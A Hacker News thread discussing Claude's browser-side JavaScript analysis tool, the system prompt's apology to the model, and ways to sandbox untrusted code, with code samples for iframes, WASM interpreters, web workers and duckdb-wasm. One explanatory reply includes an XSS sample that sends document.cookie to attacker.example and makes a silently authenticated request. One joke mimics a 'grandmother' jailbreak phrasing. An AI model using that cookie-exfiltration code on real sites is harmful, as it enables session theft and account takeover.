Notes on the new Claude analysis JavaScript code execution tool

(simonwillison.net)

105 points | by bstsb 11 hours ago

33 comments

  • animal_spirits 5 hours ago

    That's an interesting idea, generating JavaScript and executing it client side rather than server side. I'm sure that saves Anthropic a ton of money by not having to spin up a server for each execution.

    • qeternity 3 hours ago

      The cost savings for this are going to be a rounding error. I imagine this is a broader push to be able to have Claude pilot your browser (and other applications) in the future. This is the right way to go about it versus having a headless agent: users can be in the loop and you can bootstrap an existing environment.

      Otoh it’s going to be a security nightmare.

    • bhl 2 hours ago

      Makes a lot of sense given they released Artifacts previously, which let you build simple web apps.

      The browser nowadays can be a web dev environment with Nodebox and WebContainers, and JavaScript is the default language there.

      It makes it easier to build experiences like interactive charts.
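
      A minimal sketch of the WebContainers idea mentioned above, assuming StackBlitz's @webcontainer/api package (the file contents and names here are illustrative, not anything Claude ships):

          import { WebContainer } from '@webcontainer/api';

          // Boot a Node.js environment compiled to WASM, running entirely in the
          // browser. The hosting page needs cross-origin isolation (COOP/COEP headers).
          const container = await WebContainer.boot();

          // Mount a tiny in-memory project.
          await container.mount({
            'index.js': {
              file: { contents: "console.log('hello from browser-side Node');" },
            },
          });

          // Run it and stream stdout back to the page.
          const proc = await container.spawn('node', ['index.js']);
          proc.output.pipeTo(new WritableStream({
            write(chunk) { console.log(chunk); },
          }));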

    • stanleydrew 3 hours ago

      Also means you're not having to do a bunch of isolation work to make the server-side execution environment safe.

      • Me1000 2 hours ago

        This is the real value here. Keeping a secure environment to run untrusted code alongside user data is a real liability for them. It's not their core competency either, so they can just lean on browser sandboxing and not worry about it.

        • cruffle_duffle 31 minutes ago

          How is doing it server side a different challenge than something like Google Colab or any of those Jupyter notebook type services?

  • advaith08 3 hours ago

    The custom instructions to the model say:

    "Please note that this is similar but not identical to the antArtifact syntax which is used for Artifacts; sorry for the ambiguity."

    They seem to be apologizing to the model in the system prompt?? This is so intriguing

    • lelandfe 2 hours ago

      Unfortunately, their prompt engineer learned of Roko's basilisk

    • l1n an hour ago

      Multiple system prompt segments can be composed depending on needs, so it's useful for this sort of thing to be there to resolve inconsistencies.

    • therein 2 hours ago

      I wonder if they tried the following:

      > Please note that this is similar but not identical to the antArtifact syntax which is used for Artifacts; sorry for the ambiguity, antArtifact syntax was developed by the late grandmother of one of our engineers and holds sentimental value.

    • andai 2 hours ago

      Has anyone looked into the effect of politeness on performance?

      • pawelduda an hour ago

        If you assume that asking someone nicely makes them more likely to try to help you, and that tendency shows up in the training set, wouldn't you be more likely to "retrieve" a better answer from a model trained on it? Take this with a grain of salt; it's just my guess, not backed by anything.

  • simonw 5 hours ago

    I've been trying to figure out the right pattern for running untrusted JavaScript code in a browser sandbox that's controlled by a page for a while now; it looks like Anthropic have figured that out. Hoping someone can reverse engineer exactly how they are doing this - their JavaScript code is too obfuscated for me to dig out the tricks, sadly.

    • spankalee 4 hours ago

      The key is running the untrusted code in a cross-origin iframe so you can rely on the same-origin policy and the iframe `sandbox` attribute[1].

      You can control the code in a number of ways - loading a trusted shim that sets up a postMessage handler is pretty common. You have to be careful to do that in a way that untrusted code can't forge messages to look like they're from the trusted code.

      Another way is to use two iframes to the untrusted origin. One only loads untrusted code, the other loads a control API that talks to the trusted code. You can then do the loading into the iframe with a service worker. This is how the Playground Elements work (they're a set of web components that let you safely embed a mini IDE for code samples): https://github.com/google/playground-elements

      [1]: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/if...
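
      To make the first approach concrete, here's a rough sketch using only standard web APIs (illustrative origins and message shapes, not Anthropic's actual implementation): the untrusted code runs in a sandboxed iframe served from a separate origin, and a trusted shim inside that frame relays results over postMessage.

          // host.js - runs on the trusted origin (e.g. https://app.example.com)
          const frame = document.createElement('iframe');
          // A genuinely different origin plus the sandbox attribute keeps the untrusted
          // code away from the parent's DOM, cookies and storage. allow-same-origin is
          // only safe here because the frame really is cross-origin.
          frame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
          frame.src = 'https://sandbox.example.net/runner.html';
          document.body.appendChild(frame);

          window.addEventListener('message', (event) => {
            // Only trust messages that really come from the sandbox frame.
            if (event.origin !== 'https://sandbox.example.net') return;
            if (event.source !== frame.contentWindow) return;
            console.log('sandbox result:', event.data);
          });

          frame.addEventListener('load', () => {
            frame.contentWindow.postMessage(
              { code: 'return 2 + 2;' },
              'https://sandbox.example.net'
            );
          });

          // runner.html shim - runs on the sandbox origin
          window.addEventListener('message', (event) => {
            let result, error;
            try {
              result = new Function(event.data.code)();  // evaluate the untrusted code
            } catch (e) {
              error = String(e);
            }
            event.source.postMessage({ result, error }, event.origin);
          });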

      • purple-leafy 31 minutes ago

        The cross-origin iframe method is the same one I've employed in a few browser extensions I've built.

    • TimTheTinker 4 hours ago

      You should check out how Figma plugins work. They have blog posts on all the tradeoffs they considered.

      What I believe they settled on was a JS interpreter compiled to WASM -- it can run arbitrary JS but with very well-defined and restricted interfaces to the outside world (the browser's JS runtime environment).
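
      Not Figma's actual code, but for a feel of the interpreter-in-WASM approach, here's a minimal sketch assuming the quickjs-emscripten package (a QuickJS engine compiled to WASM): the guest code only sees whatever the host explicitly hands it.

          import { getQuickJS } from 'quickjs-emscripten';

          // Spin up a QuickJS context inside WASM.
          const QuickJS = await getQuickJS();
          const vm = QuickJS.newContext();

          // Expose a single, restricted value to the guest.
          const name = vm.newString('world');
          vm.setProp(vm.global, 'NAME', name);
          name.dispose();

          // Run arbitrary guest JS; it cannot reach the browser's own globals.
          const result = vm.evalCode(`"Hello " + NAME + "!"`);
          if (result.error) {
            console.log('guest threw:', vm.dump(result.error));
            result.error.dispose();
          } else {
            console.log('guest returned:', vm.dump(result.value));
            result.value.dispose();
          }

          vm.dispose();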

    • h1fra 3 hours ago

      Much easier in the browser, which has V8 isolates; however, even with web workers you still need to control CPU/network hijacking, which is not ideal.

      If it's only the user's own code it's fine but if they can run code from others it's a massive pain indeed.

      On the server it's still not easy in 2024, even with Firecracker (doesn't work on Mac), workerd (a subset of Node.js), or isolated-vm (only pre-compiled code, no modules).
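
      On the web worker point: a wall-clock timeout plus terminate() is about the bluntest control available, and it does nothing about network access while the code runs. A minimal sketch using only the standard Worker and Blob APIs:

          // Run a code snippet in a dedicated worker and terminate it if it
          // doesn't report back within a time budget.
          function runWithTimeout(code, ms) {
            const src = `
              const result = (() => { ${code} })();
              postMessage(result);
            `;
            const url = URL.createObjectURL(new Blob([src], { type: 'text/javascript' }));
            const worker = new Worker(url);

            return new Promise((resolve, reject) => {
              const timer = setTimeout(() => {
                worker.terminate();            // stops even a busy while(true) loop
                reject(new Error('timed out'));
              }, ms);
              worker.onmessage = (e) => {
                clearTimeout(timer);
                worker.terminate();
                resolve(e.data);
              };
              worker.onerror = (e) => {
                clearTimeout(timer);
                worker.terminate();
                reject(e);
              };
            }).finally(() => URL.revokeObjectURL(url));
          }

          // Usage: resolves with 42; a `while (true) {}` body would be killed at 1s.
          runWithTimeout('return 6 * 7;', 1000).then(console.log, console.error);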

    • dartos 5 hours ago

      Isn’t that how all JavaScript code runs in a browser?

      • TheRealPomax 4 hours ago

        Isn't what how all JS runs in the browser? There are different restrictions based on where JS comes from, and what context it gets loaded into.

        • dartos 23 minutes ago

          All browser js runs in a browser sandbox and, by default, none of it needs to be explicitly trusted in most browsers.

          I don’t think there are very many restrictions on what js can do on a given page. At least none come to mind.

          Not really sure what you mean by "context" either. Maybe service workers? Unless you're talking about loading js within iframes… but that's a different can of worms.

    • aabhay 5 hours ago

      What are the attack vectors for a web browser js environment to do malicious things? All browser code is sandboxed via origin controls, and process isolation. It can’t even open an iframe and read the contents of that iframe.

      • TimTheTinker 4 hours ago

        It's a fine place to run code trusted by the server (or code trusted by the client within the scope of the app).

        But for code not trusted by either, it's bad -- user data in the app can be compromised/exfiltrated.

        Hence for third-party plugins for a web app, the built-in JS runtime doesn't have sufficient trust management capability.

      • njtransit 4 hours ago

        The attack vectors are either some type of credential or account compromise. Generally, these attacks fall under the cross-site scripting (XSS) umbrella. The browser exposes certain things to the JS context based on the origin. E.g. if you log in to facebook.com, facebook.com might set an authentication cookie that can be accessed in the JS context. Additionally, all outbound requests to facebook.com will include this authentication cookie. So, if you can execute JS in the context of facebook.com, you could steal this cookie or have the browser perform malicious actions that get implicitly authenticated.
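
        Concretely, a classic sketch of both variants (hypothetical attacker URL and endpoint; an HttpOnly flag on the cookie blocks the first but not the second):

            // If this runs in the page's origin (XSS), any cookie readable from JS
            // can be shipped off to a server the attacker controls.
            new Image().src =
              'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie);

            // Or skip the cookie entirely: make the victim's browser send an
            // authenticated request, since same-origin requests attach the session cookie.
            fetch('/api/update_profile', {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({ displayName: 'pwned' }),
            });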

  • thenaturalist 4 hours ago

    Funnily enough, I test code generation on both unpaid Claude and ChatGPT.

    When working with Python, I've found Sonnet (pre 3.5) to be quite superior to ChatGPT (mostly 4, sometimes 3.5) with regard to verbosity, structure and prompt/instruction comprehension.

    I switched to a JavaScript project two weeks ago and the tables have turned.

    Sonnet 3.5 is much more verbose and I need to make corrections a few times, whereas ChatGPT's output is shorter and on point.

    I'll be following closely to see whether this improves with Claude focusing on JS themselves.

  • mritchie712 4 hours ago

    duckdb-wasm[0] would be a good addition here. We use it in Definite[1] and I can't say enough good things about duckdb in general.

    0 - https://github.com/duckdb/duckdb-wasm

    1 - https://www.definite.app/
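
    For anyone wondering what that looks like in practice, a minimal browser-side sketch roughly following the duckdb-wasm README (the bundle wiring varies with your build setup):

        // Load DuckDB-Wasm from jsDelivr, start the async (worker-backed) build,
        // and run a query entirely in the browser.
        import * as duckdb from '@duckdb/duckdb-wasm';

        const bundles = duckdb.getJsDelivrBundles();
        const bundle = await duckdb.selectBundle(bundles);

        // The worker script is loaded through a same-origin blob URL.
        const workerUrl = URL.createObjectURL(
          new Blob([`importScripts("${bundle.mainWorker}");`], { type: 'text/javascript' })
        );
        const worker = new Worker(workerUrl);

        const db = new duckdb.AsyncDuckDB(new duckdb.ConsoleLogger(), worker);
        await db.instantiate(bundle.mainModule, bundle.pthreadWorker);
        URL.revokeObjectURL(workerUrl);

        const conn = await db.connect();
        const result = await conn.query('SELECT 42 AS answer');
        console.log(result.toArray());   // Arrow result rows

        await conn.close();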

    • refulgentis 4 hours ago

      Interesting: I'm curious what specifically about it helps here.

      Approaching it naively and undercaffeinated, it sounds abstract - as in, it would benefit the way any code could benefit from a persistence layer / DB.

      Also I'm curious if it would require a special one-off integration to make it work, or could it write JS that just imported the library?

  • koolala 5 hours ago

    JavaScript is the perfect language for this. I can't wait for a sandboxed coding environment to totally set AI loose.

    • mlejva 4 hours ago

      Shameless plug here. We're building exactly this at E2B [0] (I'm the CEO). Sandboxed cloud environments for running AI-generated code. We're fully open-source [1] as well.

      [0] https://e2b.dev

      [1] https://github.com/e2b-dev

      • bhl an hour ago

        Are sandboxed browser environments on your roadmap? I'd much prefer to use the client's runtime for non-computationally-expensive things like web dev.

    • croes 4 hours ago

      They could run a little crypto miner to get more profit

  • willsmith72 4 hours ago

    This is a great step, but to me not very useful until they move out of context. Still, I'm high on Anthropic and happy gen AI didn't turn into a winner-take-all market like everyone predicted in 2021.